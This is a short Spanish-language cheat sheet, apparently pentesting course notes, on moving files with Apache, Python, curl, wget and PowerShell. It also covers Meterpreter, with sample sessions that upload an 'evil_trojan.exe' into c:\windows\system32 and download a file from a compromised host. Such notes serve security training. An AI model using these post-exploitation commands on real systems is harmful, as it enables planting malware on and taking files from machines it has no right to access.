



Transferencia de ficheros



## **Transferencia de Ficheros**

- Apache (servicio WEB)
  - Los servidores WEB pueden usar el protocolo de transferencia de archivos
    - sudo systemctl start apache2
- Python
  - El comando Python que se ejecuta con "SimpleHTTPServer" en el puerto 80 crea e inicia instantáneamente el servidor web.
    - python -m http.server 8081
- Curl
  - curl http://192.168.8.22/archivo.txt > prueba1.txt
- Wget
  - wget <a href="http://192.168.8.22/archivo.txt">http://192.168.8.22/archivo.txt</a>
- Powershell
  - Invoke-WebRequest -Uri "http://192.168.8.22/archivo.txt" -OutFile "prueba3.txt"
  - iwr -uri <a href="http://192.168.8.22/archivo.txt">http://192.168.8.22/archivo.txt</a> -o prueba4.txt
  - wget <a href="http://192.168.8.22/archivo.txt">http://192.168.8.22/archivo.txt</a> -o prueb5.txt



## Transferencia de Ficheros

- Meterpreter:
  - Upload
    - El comando carga un archivo de la máquina remota.
    - Tenga en cuenta el uso de las barras dobles al proporcionar la ruta de Windows.

```
meterpreter > upload evil_trojan.exe c:\\windows\\system32
[*] uploading : evil_trojan.exe -> c:\windows\system32
[*] uploaded : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe
meterpreter >
```

## Download

- El comando descarga un archivo de la máquina remota.
- Tenga en cuenta el uso de las barras dobles al proporcionar la ruta de Windows.

```
meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
meterpreter >
```

## THE BRIDGE